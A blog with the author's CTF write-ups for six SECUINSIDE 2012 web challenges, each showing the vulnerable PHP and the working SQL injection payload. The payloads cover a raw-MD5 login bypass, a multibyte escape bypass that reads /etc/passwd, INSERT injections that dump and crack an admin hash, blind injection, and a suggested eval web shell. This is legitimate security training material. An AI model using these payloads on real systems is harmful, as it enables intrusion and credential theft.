A disturbing lack of taste. Just another WordPress site

11Jun/126

SECUINSIDE 2012 prequals CTF – web writeup (cliph + sqlgeek)

Hello,
I participated (as Tasteless) at SECUINSIDE 2012 CTF prequals and really
liked it because many webchalls were available.
Other guys from team were mostly missing but I suceded in finishing 5 of 6 challs.
Here are writeups;

----------------------------------------------------------------------

cliph: login bypass using MD5 in raw format

$mpw=md5("$_POST[ip]",true);
$q=mysql_fetch_array(mysql_query("select * from member where id='$_POST[id]' and ip='$mpw'"));

in PHP, md5($string,true) will return raw format of MD5 which can have some characters like ',",= etc
Now, shortest usable injection is MD5 with '=' somewhere in there.
here is small PHP script to get those:
<?php
for($i=1;$i<=100000000;$i++)
if(strpos(md5($i,true),"'='")>-1)echo $i."\n";
?>
it gave me few number, I used 2998869
login as
id:admin
ip:2998869
making the query
select * from member where id='admin' and ip='¦-'=':ÚTŕÍ,pžÇ˝ß'
Making it true because in MySQL Select 'a'='b'='c' is true.
flag was visible when you login'd as admin.
It actually required you to have at lest 2147483647 gold, guess admin had that much...

----------------------------------------------------------------------

sqlgeek

This is hardest among webchalls. I haven't really finished it but I was pretty close.

$_GET[view]=mb_convert_encoding($_GET[view],'utf-8','euc-kr');
if(eregi("from|union|select|\(|\)| |\*|/|\t|into",$_GET[view])) exit("Access Denied");
if(strlen($_GET[view])>17) exit("Access Denied");
$q=mysql_fetch_array(mysql_query("select * from challenge5 where ip='$_GET[view]' and (str+dex+lnt+luc)='$_GET[stat]'"));

magic_quotes were ON and I used multibyte character %bf%5c in order to be able to use $_GET[stat] for injection.
so,
index.php?view=%bf%5c&stat= or 3=2 union select 1,2,3,4,5,6,7-- -
Now, $_SESSION[read_me]="/etc/passwd"; tells us to read /etc/passwd
so
index.php?view=%bf%5c&stat= or 3=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7-- -

from there I saw ReADDDDDDD______MEEEEEEEEEEEEE.php - and it included your session returning it's values.
Now I didn't know what to do - I knew I need to get command execution somehow but didn't know how.
After CTF ended, user "hvortex" said I could manipulate $_SESSION[id] due to extract($_GET); which I didn't see...
I guess you could use something like $_SESSION[id]=<?php eval($_GET[cmd]); ?> then include and read flag.  I was wrong, here is whole writeup: Reiners blog

This is one of best webchalls I encountered so far. =)

Filed under: Uncategorized 6 Comments
11Jun/125

SECUINSIDE 2012 prequals CTF – web writeup (beast + yhsj)

beast: INSERT query injection

Here you could register and you would get guest status, admin was needed for flag.

here is important snippet of registration code:

if(strlen($_POST[phone])>=20) exit("Access Denied");
if(eregi("admin",$_POST[id])) exit("Access Denied");
if(eregi("load|admin|0x|#|hex|char|ascii|ord|from|select|union|infor|challenge",$_POST[phone])) exit("Access Denied");

@mysql_query("insert into challenge4 values('$_POST[id]',$_POST[phone],'guest')");

so, id was filtered and phone had to be less than 20 chars.
Took me quite long to get this one, but solution is simple:
id=nimda
phone=1,reverse(id))--%0a

making the query:
insert into challenge4 values('nimda',1,reverse(id))-- ,'guest)
Now login as "nimda" with phone "1" and you got the flag
^^ pretty nice one!

----------------------------------------------------------------------

yhsj: insert query injection

if(eregi("update|set|union|#|char|ascii|hex|infor|mysql|\.|load",$_POST[tm])) exit("<center><font color=brown>Access Denied</font></center>");
@mysql_query("insert into talk_msg values(1,'$_SESSION[id]','$ck[id]','$_POST[msg]',$_POST[tm])");

$_POST[tm] was entry point - submit something like

1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1

making the query
insert into talk_msg values(1,'plit','plit','blablabla',1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1)

Now, admin's hash is in your message. It was salted like md5('zombie_$pw') so I used hashcat+dictionaries to crack it, getting zombie_hellsonic
Login as admin:zombie_hellsonic and get the flag.

Filed under: Uncategorized 5 Comments
11Jun/120

SECUINSIDE 2012 prequals CTF – web writeup (batman + zombie)

batman: hardfiltered blind SQL injection

http://61.42.25.29/0f9dd0e033bb0854c9de75939680ce66/?no=1 (link is down)

Didn't have source for this one, most keywords were blocked.
Query looked something like
SELECT id,no FROM batman WHERE no=$_GET['no'];
Only working string functions I could find are
instr,position,substr

all kinds of operators and spaces were blocked so I used this:
?no=if(instr(id,0x30),3,5)
So, if 0x[something] is in "id" I would get some text, if not then it was blank page.
Used PHP script to quickly discover all chars used and they were:
D O P W d o p w
Then I manually mixed chars like this to get flag:
?no=if(instr(id,0x646f),3,5)
etc
Flag was opwwddddoo
instr is case-insensitive and I luckily guessed flag is lowercase :D

----------------------------------------------------------------------

zombie: blind sql injection after ORDER BY...

if(eregi("load|union| |\t|/|char|ascii|hex|<|>|infor|\.|challenge2|challenge3|challenge4",$dd)) exit("Access Denied");
$q=mysql_query("select * from challenge1 order by $dd desc");

procedure is same as batman, but this time I used LIKE (every whitespace was %0a)

if((select password from challenge1 where id=0x61646d696e and password like 0x253025),1,(select 1 from challenge1)) ->if like is false, it errors (Subquery returns more than one row)

I used PHP script to get char by char, finishing in OLDZOMBIEEEE if I remember correctly. Again, guessed case of flag ^^

----------------------------------------------------------------------

Well, this is one pretty damn long wall of text :D...

I'd like to thank Secuinside people for this great CTF, I really enjoyed it - and learned few new things and tricks!
Also thanks to Reiners for his blog and to hvortex for sqlgeek solution!

Regards,
Plitvix

Filed under: Uncategorized No Comments